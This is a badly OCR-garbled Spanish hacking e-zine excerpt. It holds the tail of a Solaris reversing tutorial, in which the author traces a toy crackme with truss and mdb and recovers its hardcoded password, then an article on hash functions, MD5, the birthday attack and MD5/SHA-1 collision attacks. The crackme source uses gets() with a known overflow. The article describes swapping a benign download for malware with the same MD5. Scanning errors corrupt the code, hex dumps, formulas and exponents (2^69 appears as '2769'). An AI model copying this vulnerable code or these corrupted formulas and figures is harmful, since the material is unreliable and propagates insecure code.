
HE write(4, "1400610E40EE002EBIOO0".., 24) =24 

Esto nos puede llegar a ser realmente util, truss tiene muchas opciones y parece ser muy potente, sera cosa de 
ponerse a mirar las opciones que brinda. 


Primer Programa: 


Para empezar tranqui, vamos a compilar un pequeño crackme, que de crackme no tendra nada, solo un serial 
harcodeado 
y comparado directamente con el que introduzcamos. 


Hinclude <stdio.h> 
int main(void) 


char pass[40]; 


printf("Ingresa tu Password: "); 
gets(pass); /*No usar en el mundo real*/ 


1f (Istrecmp("SolarisCracking”, pass)) 
printf("Bien Hecho!n”); 

else 
printf("MalMn"); 

return 0; 


) 


Muy bien, con un lindo bug tambien, pero que va, esto no es exploits en solaris xD 


Compilamos el .c con gcc (en opensolaris no viene por default hay que instalarlo aparte, muy facil con el 
gestor de paquetes) 
y tenemos nuestro ejecutable, simplemente llamado a.out 


Lo ejecutamos y vemos que funcione: 


damian(Dopensolaris:-/Desktop$ ./a.out 
Ingresa tu Password: SolarisCracking 
Bien Hecho! 


damian(Dopensolaris:-/Desktop$ ./a.out 
Ingresa tu Password: damian 
Mal! 


Veamos el crackme en truss 

damian(Dopensolaris:-/Desktop$ truss -a ./a.out 

execve("a.out", 0x08047AAC, 0x08047AB4) argc = 1 

argv: ./a.out 

sysconfigíl CONFIG_PAGESIZE) = 4096 

mmap(0x00000000, 4096, PROT_ READ[PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 
0) = 0xD2BF0000 

resolvepath("/usr/lib/ld.so.1", "/lib/ld.so.1", 1023) = 12 

getewd("/export/home/damian/Desktop", 1017) =0 
resolvepath("/export/home/damian/Desktop/a.out", "/export/Hhome/damian/Desktop/a.out", 1023) = 33 
xstat(2, "/export/home/damian/Desktop/a.out", 0x08047758) = 0 


open("/var/ld/ld.config", O RDONLY) Err+2 ENOENT 
xstat(2, "/usr/sfw/lib/libc.so.1", 0x08046F08)  Errf2 ENOENT 
xstat(2, "/lib/libc.so.1", 0x08046F08) =0 
resolvepath("/lib/libc.so.1”, "/lib/libc.so.1", 1023) = 14 
open("/lib/libc.so.1", O _RDONLY) =3 


mmap(0x00010000, 32768, PROT_READ|PROT_EXEC, MAP _PRIVATE|MAP_ALIGN, 3, 0) = 
0xD2BB0000 

mmap(0x00010000, 1384448, PROT_NONE, 

MAP PRIVATE[MAP_NORESERVE|MAP_ANONI[MAP_ALIGN, -1, 0) = 0xD2A50000 
mmap(0xD2A50000, 1274823, PROT_READ|PROT_EXEC, MAP _PRIVATE[MAP_FIXED|MAP TEXT, 
3, 0) =0xD2A50000 

mmap(0xD2B98000, 31538, PROT_ READ|PROT_WRITE|[PROT_EXEC, 

MAP PRIVATE|MAP FIXED|MAP_INITDATA, 3, 1277952) = 0xD2B98000 
mmap(0xD2BA0000, 5760, PROT_READ|PROT_WRITE|[PROT_EXEC, 

MAP PRIVATE|MAP_FIXED[MAP_ANON, -1, o 0xD2BA0000 

munmap(0xD2B88000, 65536) 

mementl(0xD2A50000, 208308, MC_ADVISE, MIDE WILLNEED, 0, 0)=0 

close(3) =0 

mmap(0x00010000, 24576, PROT_READ|PROT_WRITE|PROT_EXEC, 

MAP PRIVATE[MAP_ANON|MAP_ALIGN, -1, a 0xD2B90000 

munmap(0xD2BB0000, 32768) 

getcontext(0x08047510) 


getrlimit(RLIMIT_STACK, 0x08047508) =0 

getpid() = 1232 [1231] 

Iwp_private(0, 1, 0OxD2B92A00) = 0x000001C3 
setustack(0xD2B92A60) 

sysi86(SIS6FPSTART, 0xD2BA0C98, 0x0000133F, 0x00001F80) = 0x00000001 
1octl(1, TCGETA, 0x08046B4C) =0 

fstat64(1, O0x08046ABO0) =0 


10ctl(0, TCGETA, 0x0804790C) =0 


fstat64(0, 0x08047870) =0 

Ingresa tu Password: write(1l, "Ingresa tu P"..,, 21) =21 
read(0, OxD2BAO0CA4, 1024) (sleeping...) 

damian 

read(0, "damianin", 1024) =1 

sysconfigíl CONFIG_PAGESIZE) = 4096 

Mal! 

write(1, "Mal Mn", 5) =9 

_exit(0) 


Ahi vemos todo lo que hizo el crackme desde que se lanzo hasta que murio. 


Este comando podria ser el equivalente al KAM (Kakeeware Api Monitor) que usamos en win. Con la 
diferencia que 
este logguea system calls y no apis. 


Pues abramoslo en el debugger y veamos que podemos hacer para conseguir nuestro serial 


damian(Dopensolaris:-/Desktop$ mdb a.out 
> 


Ya sabemos como se compara el serial, esto no tiene ninguna gracia pero bue... 
Le ponemos un breakpoint en stremp y hacemos que corra el programa 


damian(Dopensolaris:-/Desktop$ mdb a.out 
> stremp::bp 

> E 

Ingresa tu Password: 


Ponemos cualquier serial, de menos de 40 letras para no triggerear el stack overflow xD y damos enter 


damian(Dopensolaris:-/Desktop$ mdb a.out 
> stremp::bp 

16 

Ingresa tu Password: cualquierpass 

mdb: stop at 0x8050abc 

mdb: target stopped at: 

PLT:stremp: ¡mp  *0x8060e24 

> 


Se detuvo en el breakpoint, ahora podemos ver los registros o el stack 


damian(Dopensolaris:-/Desktop$ mdb a.out 
> stremp::bp 

0 

Ingresa tu Password: cualquierpass 

mdb: stop at 0x8050abc 

mdb: target stopped at: 

PLT:stremp: ¡mp *0x8060e24 


> TOgs 

%ecs = 0x016b %eax = 0x08047a54 
%ds = 0x0173 %ebx = 0xd2bfc7cc 
%ss =0x0173 %ecx = 0x000003f2 
%es = 0x0173 %edx = 0x08047a62 
%ífs = 0x0000 %esi = 0x08047a6c 


%gs = 0x01c3 %edi = 0x08047b50 


%eip = 0x08050abc PLT:strecmp 
%ebp = 0x08047a8c 
%kesp = Oxdbc83fe4 


%eflags = 0x00000212 
1d=0 vip=0 vif=0 ac=0 vm=0 rf=0 nt=0 ¡op1=0x0 
status=<of df IF tf sf, zf, AF pf cf> 


%esp = 0x08047a2c 
%trapno = 0x3 


Si vemos el contenido de eax, veremos el serial nuestro: 


> 0x08047a54,20::dump 

0123V567 89ab cdef 0123v56789abcdef 
8047a50: 01000000 6375616c 71756965 72706173 ....cualquierpas 
8047460: 7300b0d2 bc7aa8d2 29000000 980cbad2 s....z..)....... 


8047a70: 31130000 3e0d0508 es0d0608 6c7a0408 ?...>.......lz.. 
> 


Si miramos el stack vemos que eax tambien fue pusheado: 
> 0x08047a2c,20::dump 

01234567 89abVdef 0123456789abvdef 
8047420: 62740408 54740408 8c7a0408 040d0508 bz..Tz...Z...... 
8047430: c20d0508 54740408 b3060508 7803bfd2 ....TZ......X... 
8047440: 807ba6d2 cc090508 44c3bfd2 08000000 .f......D....... 
E 


Vemos en esp+8 el puntero al pass malo y en esp+47??? 
> 08050dc2,20::dump 

01/3 4567 89ab cdef 01v3456789abcdef 
8050dc0: 2000536f 6c617269 73437261 636b696e .SolarisCrackin 
8050dd0: 67004269 656e2048 6563686f 2104004d g.Bien Hecho!..M 
8050de0: 616c210a 00000000 2c0e0608 00000000 al!............. 
> 


Creo que con esto podemos terminar la primera parte, a medida que vaya aprendiendo a usar este debugger y 
alguna que otra tool mas, tratare de ir escribiendo. 
El crackme de crackmes.de lo dejamos para la proxima. 


Saludos a todos 


Damian 


Funciones Hash. 


Vamos a explicar en este artículo las funciones Hash. Seguramente todos hemos oido hablar de 
ellas, pero pocos tendrán claro lo que son realmente y como funcionan. 

El artículo empezará desde cero e irá aumentando su nivel progresivamente hasta lograr una 
descripción total de este tipo de funciones. 


Que es un Hash? 


Si vamos a la definición de Wikipedia, nos dice "En informática, una función hash o algoritmo 
hash es una función para sumarizar o identificar probabilísticamente un gran conjunto de 
información, dando como resultado un conjunto imagen finito generalmente menor ..." 


Muy bonito todo, pero como he dicho, voy a comenzar este artículo desde cero, paso a paso y 
despacito, para que todo el mundo pueda seguir por lo menos el principio. 


Una función hash es un algoritmo matemático que nos da un resultado B al aplicarlo a un valor 
inicial A. Es como cualquier función matemática, por ejemplo la función raiz cuadrada nos daría 
como resultado 2 si se la aplicamos al número 4. E igual que cualquie función matemática tiene 
que actuar de tal forma y tiene que cumplir con ciertos criterios. No nos puede devolver 
cualquier cosa, lo que nos devuelva requiere que tenga ciertas propiedades para que podamos 
usarlo. 


Que propiedades tienen que cumplir las funciones hash? 


1- Sea cual sea la longitud del texto base A, la longitud de su hash resultante B 
siempre va a ser la misma. Por ejemplo, si la longitud de la salida B esta defiinida en 128 bits, 
si aplicamos una función hash a un A de 5 bits nos dará un B de 128 bits, y si se la aplicamos a 
un A de 380 millones de bits, nos dará un B de 128 bits igualmente. 


2- Para cada entrada A, la función generará una salida B única. O lo que es lo mismo, es 
imposible que dos textos bases A y A' tengan un mismo hash B. 


Según estas dos primeras propiedades, nos damos cuenta enseguida de la utilidad de las 
funciones de hash. 


La más inmediata es usarla para generar un resumen de algo. De hecho, estas funciones se 
conocen también como funciones resumen. Un ejemplo real puede ser el del típico repositorio de 
documentos. Si alguien quiere almacenar digamos "Las_Aventuras_Del_Ingenioso.doc" cuyo 
contenido es El Quijote enterito, el sistema lo primero que tiene que hacer es revisar que no está 
previamente ya almacenado con el mismo o con otro nombre, por ejemplo "ElQuijote.doc". El 
sistema puede comparar letra a letras el documento de entrada con todos los docs de su BBDD 
para comprobar que no está, o puede comparar el resumen del documento de entrada con los 
resúmenes de los documentos de la BBDD, opción mucho más manejable y rápida. 


Además, como la salida B es única para cada A, se puede usar también para verificar la 
integridad de A. Podemos ver que muchos programas incluyen su hash junto con su descarga, 
de esta forma, podemos verificar que el programa no ha sido modificado ni le han introducido un 
virus o ha sido troyanizado. Si a los bytes de una aplicación A les calculo el hash B y lo adjunto, 
cuando alguien modifique la aplicación A, al calcular de nuevo su hash su valor habrá cambiado 
y será distinto de B. 


Podeis probar a calcular el md5 de un documento, luego modificais una simple coma del 
documento y calculais de nuevo el MD5. Vereis como ha cambiado completamente, aunque solo 
hemos modificado una simple coma. 


3- Dado un texto base, es fácil y rápido (para un ordenador) calcular su número 
resumen. 


4- Es imposible reconstruir el texto base a partir del número resumen. 


Esto es lo que se conoce como One-Way hash functions. A partir del hash es imposible 
reconstruir el texto base. 

Atención aquí !!!, no quiero que os lieis. Este es un punto que muchos no teneis claro. Solo hay 
que leer bien, a partir del hash B es imposible sacar el texto A, quiere decir no existe forma o es 
computacionalmente imposible, que mediante operaciones matemáticas inversas o no a las del 
algoritmo de hash, se llegue desde B al texto base. 


Si os dais cuenta, esto es muy distinto que usar fuerza bruta. No tiene nada que ver. Con fuerza 
bruta le aplicamos la función de hash a diferentes textos hasta que obtenemos un hash similar al 
hash del texto que buscamos, con lo que por consecuencia tendremos el texto buscado. 


Nuestra función hash. 


Vamos a inventarnos un ejemplo para verlo claramente. Esto no podría tomarse como una 
función hash fiable porque es demasiado débil a ataques, pero nos vale como ejemplo gráfico 
por si no ha quedado del todo claro. 


Esta función hash de nuestro ejemplo lo que hace es traducir cada caracter del texto A de 
entrada en su equivalente código ASCII, los agrupa de 3 en 3 y les aplica la función matemática 
(12 - 22) * 32, 


Ela lu a 1 Mi Tu la Te cf Ja le 151 
_69 [110/32|117/110] 32 [108/117/103[97/114] 32 |100/101| 32 
312 [| 224 | 


108] 97 [32| 77 | a7 [110] e9 [104| a7 [32[100/101| 32 | 99 [ 117] 
| 32 | -220 | es | -6868 | -7e39 |-17040 


Como vemos, el valor de nuestra función hash aplicada al texto base A "En un lugar de la 
Mancha de cu” es -19631. 


Cumple la propiedad 1, (o casi), con un poquito más de desarrollo se puede hacer que el tamaño 
del hash devuelto sea siempre el mismo. 


Cumple con la 2, el valor del hash es único para cada texto. Si modificamos lo más mínimo la 
frase, el valor cambia. 


Cumple con la 3 ya que es inmediato sacar el resultado y con la 4, ya que a partir del -19631 no 
se puede llegar al texto. 


5. - No puede presentar Colisiones. 
Que son las colisiones? 


Según la primera caracteristica que hemos visto de las funciones hash, que nos dice que el 
tamaño del hash B resultante de A es siempre el mismo, deducimos que no puede cumplirse la 


segunda caracterisitca, que dice que el hash B tiene que ser único para cada A. 


Por ejemplo, la función MD5 nos devuelve un hash de 128 bits. Para que cada hash equivalga a 
un unico texto base, tendría que existir solamente un texto por cada combinación del hash 
devuelto, o sea, tendría que haber solamente 27128 textos distintos, lo cual no es cierto. Como 
textos distintos hay infinitos, podemos decir que hay infinitas posibilidades de que dos textos 
tengan el mismo hash. 


Esto es lo que se conoce como colisiones. 


Seguramente las hemos visto muchas veces sin darnos cuenta de que pasaba. Hay muchos 
sistemas que requieren contraseñas de uso, como pueden ser los sistemas de foros y demás, 
donde lo que se almacena no es la contraseña, sino el hash de esa contraseña. Esto no se hace 
con el propósito de resumir la contraseña, seguramente será mas corta que el hash generado, se 
hace con el propósito de que si alguien tiene acceso al almacén de contraseñas, o si alguien 
desensambla la aplicación proteguida, etc, no pueda ver la contraseña en plano y siga sin acceso 
(a no ser que la crackee por fuerza bruta si conoce el algoritmo de la función). 

Os habeis encontrado alguna vez con algún programa que te pide una contraseña para acceder a 
algo, le metes el crackeador, y te da acceso pero sin darte la clave? Creo recordar que en el 
Excel95 o 97, el programa que desprotejía las hojas o las celdas, funcionaba así, te desproteguía 
la hoja pero no te daba la clave. 


Eso es porque el algoritmo de la función hash que usan para las contraseñas es tan simple como 
el que hemos puesto de ejemplo, y tiene multiples colisiones muy fáciles de encontrar. Así que 
en vez de buscar la contraseña se buscaban colisiones a ese hash, contraseñas alternativas que 
tenían el mismo hash que la contraseña verdadera. 


La fortaleza de una función hash requiere que estas colisiones sean las mínimas posibles y que 
encontrarlas sea lo más dificil posible. 


Bien, hasta aquí llega la parte básica de las funciones hash. Se explica su funcionamiento 
general, sus propiedades y sus usos. 

Ya no teneis excusa para preguntar como descifrar un hash, creo que ha quedado bien claro que 
los hashes no son un método de cifrado y que desde el resultado no se puede obtener el texto 
base más que por fuerza bruta. 


Propiedades de una función hash con respecto a las colisiones. 
Las propiedades que deben de tener las primitivas hash son: 

1. Resistencia a la preimagen: One Way Hash Function. Como hemos dicho antes, significa 
que dada cualquier imagen, es computacionalmente imposible encontrar un mensaje x tal que 
hd) =y. Otra forma como se conoce esta propiedad es que h sea de un solo sentido. 

2. Resistencia a 2” preimagen: OWHF: Weak One Way Hash Function. Significa que dado x, 
es computacionalmente imposible encontrar una x' tal que h(x)=h(x'). Otra forma de conocer 
esta propiedad es que h sea resistente a una colisión suave. 

3. Resistencia a colisión: CRHF: Strong One Way Hash Function. Significa que es 
computacionalmente imposible encontrar dos diferentes mensajes x, x' tal que h(x)=h(x'). Esta 
propiedad también se conoce como resistencia a colisión fuerte. 

Vamos a poner unos ejemplos para ver la necesidad de estas propiedades: 


Vamos a establecer un escenario de firma digital. 


Un documento X se adjunta con su firma, que consiste en clacular el hash de X, h(X), y en 


cifrarlo, C(h(X)) con la clave privada del remitente o propietario. 

Para verificar la integridad de X, el destinatario o la persona correspondiente descifra con la 
clave pública del propietario el C(h(X)) para obtener el h(X) inicial, calcula de nuevo el h(X) del 
documento y los compara. Si el h(X) inicial es igual al h(X) nuevo es que ese documento no ha 
sido modificado y que pertenece al firmante. 


Si esa función de hash no tiene resintencia a una 2? preimagen, un atacante C que podría 
encontrar un mensaje X' tal que h(X') = h(X), y reclamar que el documento firmado no es X sino 
Xx. 


O imaginemos que C tiene que presentar para firmar por un tercero un documento X, y a la vez 
redacta otro documento Y. Si la función hash no tiene resistencia a las colisiones, C puede añadir 
información basura a X e Y (X' e Y') de forma que h(X+X') = h(Y+Y'). Entonces el que firme X 
también está firmando Y. 


Por último si (e,n) es la clave pública RSA de A, C puede elegir aleatoriamente un y y calcular z 
= ye mod n, y reclamar que y es la firma de z, si C puede encontrar una preimagen x tal que z 
= h(x), donde x es importante para A. Esto es evitable si h es resistente a preimagen. 


Algoritmo MD5 


El algoritmo MD5 realiza las siguientes operaciones: 


1. Adición de bits de relleno: 

El mensaje es rellenado o ampliado para que su longitud en bits sea congruente a 448 módulo 
512. Esto debe ser así puesto que hay que reservar 64 bits para la adición de la longitud del 
mensaje en el próximo paso. Así pues, si no se llega a la anterior congruencia, se añadirá el 
relleno, consistente en un bit “1 seguido de tantos bits '0' como se precisen. 

La razón de porqué un uno seguido de ceros se debe que si se emplea sólo relleno con un valor 
(por ejemplo todo ceros) el proceso no sería reversible a la hora de eliminar dicho relleno. 


De todas maneras, siempre se realiza esta operación de relleno, aunque la longitud del mensaje 


ya sea congruente a 448 en módulo 512. Por ello, se añadirán como mínimo 1 bit de relleno, y 
como máximo 512 bits. Obsérvese la siguiente figura: 


4 L* 512 bits totales 


Relleno 
1- 512 bit 
4———— MY? bits del mensaje ES — ES Longitud del mensaje 


60-81] — kmod2" 


WE = Vector encadenado 
Y  = bloque de datos de entrada ¡-ésimo 
L'- = Numero de bloques de datos de entrada 


2. Adición de representación binaria de longitud del mensaje: 
Posteriormente se añade al mensaje (con el relleno realizado) una representación de la longitud 


del mensaje antes de ser rellenado. Dicha representación tendrá una longitud de 64 bits (16 
palabras de 32 bits, es decir, dos enteros de 4 octetos cada uno). En el caso de que el mensaje 
sea mayor de bits, sólo se tendrán en cuenta los 64 bits menos representativos, que es lo 
mismo que decir que esta representación de la longitud del mensaje está realizada en módulo. 


El mensaje tiene ahora un número de bits múltiplo de 512, por lo que habrá un número entero 
de palabras de 32 bits (enteros de 4 octetos), concretamente 512 / 32 = 16, de lo que se puede 
concluir que si hay b bloques de 512 bits cada uno que forman el mensaje, entonces el mensaje 
tendrá n palabras de 32 bits: n = 16 * b 


3. Inicializar buffer MD: 

Para poder calcular el valor hash o resumen se necesita tener un buffer de 4 palabras de 32 bits 
(A, B, C, D), pero antes de comenzar con el proceso se los ha de inicializar con algún valor 
determinado, que Rivest establece: 


Palabra A = 01 23 45 67 67 45 23 01 
Palabra B = 89 ab cd ef ef cd ab 89 
Palabra C = fe dc ba 98 98 ba dc fe 
Palabra D = 76 54 32 10 10 32 54 76 


En la primera columna los valores hexadecimales están ordenados de modo que los valores 
menos significativos aparecen en primer lugar (notación empleada por Rivest en la 
implementación de este algoritmo), y en la segunda los valores más significativos están a la 
izquierda (posiciones más altas de la memoria en Intel 80xxx) 


La razón de ver estas formas de representar los mismos valores se debe a intentar evitar 
confusiones, pues en función del tipo y arquitectura de la máquina sobre la que ha de trabajar 
el algoritmo, este sufrirá adaptaciones en dichos valores al realizar la implementación. Ello es 
debido a las distintas formas en que se almacenan los datos en memoria en las distintas 
arquitecturas (Intel, Sun, Sparc, ...) 


Los algoritmos MD4 y MD5 están pensados para facilitar su implementación en arquitecturas 
denominadas little-endian. Este formato asume que el byte menos significativo de una palabra 
se almacena en la posición más baja, y el byte más significativo en la parte más alta. Es el 
formato que emplean los procesadores Intel 80xxx que integran los PC domésticos. 


4. Procesar el mensaje en bloques de 512 bits: 
Esta es la parte central del algoritmo. Aquí se definen las cuatro funciones que se emplearán en 
las cuatro vueltas que se aplicarán sobre cada bloque. Véase la siguiente figura: 


Aplicación de función 1 
(16 pasos 


La 


VE¿= Vector encadenado ¡-ésimo 
Y, = Bloque de datos de entrada iésimo 
+= Suma en módulo 2 


Estas cuatro funciones reciben como parámetros de entrada tres palabras de 32 bits cada una 
(tres enteros de 4 bytes de longitud) y devuelven como salida una. Son las siguientes: 


F(X, Y, Z) = (X and Y) or ((not X) and Z) 
G(X, Y, Z) = (X and Z) or (Y and (not Z)) 
H(X, Y, Z) =X Y Z 

(Xx, Y, Z) = Y (Xor (not Z)) 

Donde F funciona como una sentencia condicional if en programación tradicional: Sí X = 1 
entonces Y será 1 de lo contrario Z será 1. 


G también funciona de manera condicional como F: Si Z = 1 entonces X será 1 de lo contrario Y 
será 1. 

H simplemente realiza la operación OR-Exclusiva (XOR) de X, Y y Z. 

| realiza la operación XOR con X sies1losiZeso0O. 


Por otro lado MD5 no utiliza las constantes ('magic' constants) que se empleaban en MD4. En su 
lugar se emplea una tabla de 64 elementos construida a partir de la función trigonométrica seno. 
Sea T el elemento ¡-ésimo de dicha tabla, que será igual a la parte entera de 4294967296 veces 
abs(sen(i)), donde i está expresada en radianes. Puesto que hay que realizar 16 pasos en cada 
una de las cuatro vueltas, es decir, 64 operaciones, la idea es usar una constante de la anterior 
tabla para cada vuelta. 

5. Recoger el valor hash de salida: 


El valor hash de salida se obtiene de los registros A, B, C y D donde el octeto más representativo 
es D y el que menos A. 

Ataques 

Ataque de Cumpleaños. 


El ataque más conocido (de fuerza bruta) a una función hash es conocido como "birthday attack" 


y se basa en la siguiente paradoja. 


Cual es la cantida de personas que hay que poner en una habitación para que la probabilidad de 
que el cumpleaños de una de ellas sea el mismo día que el mio? 


Debemos calcular un tal que n(1/365) > 0.5, luego n > 182. 


Sin embargo, cual sería la cantidad de personas necesarias para que dos cualesquiera de ellas 
cumplan años el mismo dia? 


Cada pareja tiene un probabilidad de 1/365, y en un grupo de n personas hay n(n-1)/2 parejas 
diferentes, luego 
(n(n-1)/2)(1/365) > 0.5 


Esto se cumple si n>23, una cantidad sorprendente mas pequeña que 182. 


La consecuencia de esta paradoja es que aunque es muy dificil dado un x calcular un x' tal que 
hd) = h(x), resulta mucho más fácil buscar dos valores aleatorios x y x' tal que h(x) = h(x?). 


Esto en la práctica significa que un hash de n bits permitiría una colisión de 22 preimagen o débil 
una vez de cada 2"n, pero producirá una colisión fuerte una vez de cada 27 (n/2). 


En el caso de un hash de 64 bits necesitaríamos 2764 mensajes dado un x para obtener el x', 
pero bastaría generar 27 32 mensajes aleatorios para que aparecieran dos con el mismo hash. El 
primer ataque nos llevaría 600.000 años en un ordenador que generara un millón de mensajes 
por segundo, mientras que el segundo apenas necesitaría unas horas. 


Ataque Wang-Yin-Yu o Ataque chino 


Supongo que muchos habreis leído actualmente que las funciones hash MD5 y SHA1 han sido 
rotas por un grupo de matemáticos chinos y que ya no sirven para nada y demás. 


Vamos a tratar de explicar esto para que todo el mundo pueda evaluar el grado de ruptura de 
estas funciones, porque se habla mucho de esto en los foros, pero no se evalua hasta que punto 
nos afecta. 


Como hemos visto en el Ataque de Cumpleaños, para encontrar dos mensajes X y X' aleatorios 
que tengan el mismo SHA-1 (160 bits) por ejemplo, por fuerza bruta se necesitarían generar 
27(160/2) mensajes. 


Pues bien, este grupo de matemáticos ha descubierto un sistema que permite hacer esto con un 
esfuerzo menor que por fuerza bruta. 


En concreto para el SHA1, pueden encontrar una "colisión de cumpleaños" con un esfuerzo 
equivalente a 2769 operaciones hash, en vez de las 27 80 requeridas por fuerza bruta. 


Como podemos ver, este es una ataque contra las colisiones fuertes, pero no contra las 
colisiones de 2 preimagen, a las cuales no afecta. Si alguien quiere generar un mensaje x' que 
tenga el mismo SHA1 que un mensaje x ya existente, tiene que seguir generando 27 160 
mensajes para conseguirlo. 


Y aunque el "ataque de cumpleaños" contra SHAl se ha vuelto 2000 veces más rápido, sigue 
siendo del orden de 10.000 veces más dificil que un ataque contra un DES, que no está al 
alcance de todo el mundo. 


Ahora bien, existen casos en que las implicaciones son importantes. 


Imaginemos que redacto un contrato A de venta de un inmueble en word, al cual le adjunto 


varios jpgs con fotografías del inmueble. 


Al mismo tiempo genero un contrato alternativo A' con las mismas fotos pero modificando el 
precio de venta a mi favor. 


Es prácticamente imposible que el h(A) = h(A)). 


Sin embargo puedo crear múltiples versiones de A y de A', modificando aleatoriamente bits de 
las fotografías (se podría hacer modificando el texto, añadiendo espacios, cambiando cosas no 
significativas, etc, pero quedaría un texto muy sucio y se notaría la "trampa". Pero modificando 
bits de las fotografías como mucho perderé algo de calidad), hasta conseguir dos versiones que 
tengan el mismo hash. 


Le presento al comprador la versión de A, acepta las condiciones y lo firma electrónicamente. 
Cambio la variante de A por la de A' y ya tengo un contrato legal de compraventa firmado con 
unas condiciones distintas de lo establecido. 


Si la función hash que se va a utilizar para realizar la firma es por ejemplo un SHA1, mediante el 
ataque tri-chino tendré que generar 2769 variantes de A y 2769 variantes de A', que como 
hemos visto antes, aunque no esté al alcance de cualquiera, es factible. 


Pero si la función hash es por ejemplo un MD5, solo tendré que generar 27 32 variantes de A y 
2732 variantes de A', que está al alcance de cualquier PC. 


Ataque Multicolision de Joux-Wang. 

Si nos fijamos en el funcionamiento del algoritmo MD5, vemos el mensaje se divide en bloques 
de 512 bits. El primer bloque es "hasheado" usando como parámetro el vector de inicialización y 
dando como resultado otro vector de 128 bits, que sirve como inicialización para el siguiente 
bloque de 512 bits, y así sucesivamente. 

Entonces se hace obvio que si tengo dos n*bloques A y B, siendo A != B, que cumplen que 
MD5(A) = MD5(B), si les añado un "payload" Q, entonces MD5(A+Q) = MD5(B+Q). 

Como posible prueba de concepto de esto os remito a un artículo de Eduardo Díaz, 

http: //www.codeproject.com/dotnet/HackingMd5.asp. 

El desarrollo ahí mostrado como ejemplo, se basa en una aplicación que ejecuta archivos en un 
formato propietario de distribución. Tenemos un ejecutable goodexe.exe que antes de 
distribuirlo se convierte a su formato .bin, y un programa "extractor" que ejecuta ese .bin. 
También tiene un ejecutable devilexe.exe que se supone que es el malware. 

Lo que hace su aplicación es, teniendo un vector A y otro B tal que MD5(A) = MD5(B), genera el 
good.bin haciendo A + goodexe.exe + evilexe.exe, y genera el evil.bin haciendo B + 
goodeexe.exe + evilexe.exe. De esta forma, MD5(good.bin) = MD5 (evil. bin). 


Luego el programa extractor, mirando si el .bin tiene A o tiene B, ejecuta goodexe o evilexe. 


De esta forma puedes colgar good.bin en la red, y mas tarde sustituirlo por evil. bin 
(previamente renombrado por supuesto). 


Como los MD5 son iguales, nadie se dudará, y ejecutará otro programa distinto. 


Personalmente no le veo utilidad a este ejemplo, es como distribuir un troyano solo que la fecha 
de activación la decides tú al cambiar de versión. 


"La historia de Alicia y su jefe" 
Hay otro ejemplo que si es más interesante. 


Aquí podeis ver dos cartas en PostScript distintas dentro del mismo contexto cuyo MD5 es el 
mismo en ambas: 
http: //www.cits.rub.de/MD5Collisions/ 


Al firmar una, que es una carta de recomendación normal y corriente, estás firmando la otra, 
que es una carta que te da acceso a unos secretos. 


Los creadores de estas cartas no dan detalles técnicos a cerca de como se hace esto, aunque 
dicen que están preparando una documentación que lo explica. 


Pero a nosotros no nos gusta esperar, así que detallamos el procedimiento en exclusiva. 
Si editamos ambos .ps, vemos que el codigo es algo tal que asi: 


Código: 

%!PS-Adobe-1.0 

%eBoundingBox: O O 612 792 

(caracteres raros)(caracteres raros)eqf/Times-Roman findfont 20 scalefont setfont 
300 700 moveto (Julius. Caesar) show 


H/Times-Roman findfont 20 scalefont setfont 
300 700 moveto (Julius. Caesar) show 


Jifelse 
showpage 


Quizás os despiste un poco porque el código está en notación polaca inversa, pero si nos fijamos 
en la línea de los caracteres raros, lo que está haciendo es comparar todo lo que hay dentro del 
primer paréntesis con lo que hay dentro del segundo. 


Si son iguales devuelve True, y se ejecuta el código del primer bloque (7, que es el que 
corresponde al de la carta de recomendación, y si no son iguales ejecuta el código del siguiente 
bloque (7, que es la carta que da poderes. 


Ahora abrimos ambos .ps con un editor hexadecimal y nos fijamos en como está la estructura 
diviéndola en bloques de 64 bytes. 


Offset 0172 3d 56 009 -4B6/0pw F 
00000000 25 21 50 53 2D 41 64 6F 62 65 2D 31 2E 30 0D 0A | X%|PS-Adobe-1.0.. 
00000010 25 25 42 6F 75 6E 64 69 6E 67 42 6F 78 3 20 30 X%BoundingBox: 0 
00000020 20 30 20 36 31 32 20 37 39 32 20 20 20 20 20 20 0 612 792 
00000030 20 20 20 20 20 20 20 20 20 20 20 20 20 0D 04 28 . 
00000040 ES 42 A6 64 DE 4D 00 E0 D5 .301_031 
00000050 2F CA B? 1? 04 46 ?E AA C0 03 54 3E Bl FB ?E 08 e. FA Dia. 
00000060 45 6D 33 05 01 FC 53 E0 SB EF A0 83 13 23 79 52 Em3..úSa[i 1.fyR 
00000070_ ED SA 33 CE 36 99 0D 9C_07 6E 45 DA 52 84 79 EB_ iZ3164.1.nEÚR1yé 
00000080 2F BD OF 95 FS 57 ES 76 34 EC BF Aá 0F 0B D9 Cá A lOvav 12d VE 
00000090 BS 73 59 48 32 F4 7D 0B_ 2C B9 A3 76 D4 36 1E 20 ysYH20)..*£v06. 
00000040 FD EF 3B 83 Al F2 7D EB CA 36 1C 53 86 58 6B C8 yi:1ió0)8É£6,SIXkE 
000000B0 F4 94 F4 4E 61 1F 7C 84 80 60 CF EF 94 BS 03 90 ólóNa.|11 Íity.1 
00000000 23 28 ES 42 AS 6A DE 4D 00 E0 DS 89 SF F8 ES 90 )(eB¡jPM.a01_eá1 
000000D0 Ci A7 2F CA B? 97? 0A 46 7E AA CO 03 54 3E Bl FB ÁS-E-1.F"2A.T>iú 
000000E0 7F 08 45 6D 33 05 01 FC 53 E0 SB EF A0 83 13 43 1.En3..úSa[i 1.£ 
000000F0 78 S2 ED SA 33 CE 36 99 0D 9C 07 6E 45 SA 52 84 xRiZ3161.).nEZRI 
00000100 79 EB 2F BD 0F 95 FS 57 ES 76 3A EC BF AA 0F 0B— y8/%, 1SWáv:i¿2.. 
00000110 D9 CA BS 73 59 C8 32 F4 7D 0B 2C B9 A3 76 D4 36 UÉpsYE26).,*zvÓ6 
00000120 1E 20 FD EF 3B 83 A1 F2 7DEBCá 36 1C 53 86 D8 . yi;11o)e£6.S10 
00000130 6B C8 F4 94 F4 4E 61 1F 7C 84 80 60 CF 6F 94 BS kEótóNa.| 11 lol» 
00000140 "03 90 29 65 71 7B 2F 54 69 6D 65 73 2D 52 6F 6D .I)eqí/Tines-Rom 
00000150 61 6E 20 66 69 6E 64 66 6F 6E 74 20 32 30 20 73 | an findfont 20 = 
00000160 63 61 6€ 65 66 6F 6E ?4 20 73 65 74 66 6F 6E 74 calefont setfont 
00000170 20 0D 04 33 30 30 20 37 30 30 20 6D 6F 76 65 74 ..300 700 novet 
00000180 6F 20 28 44 75 6C 69 75 73 2E 20 43 61 65 73 61 o (Julius. Caesa 
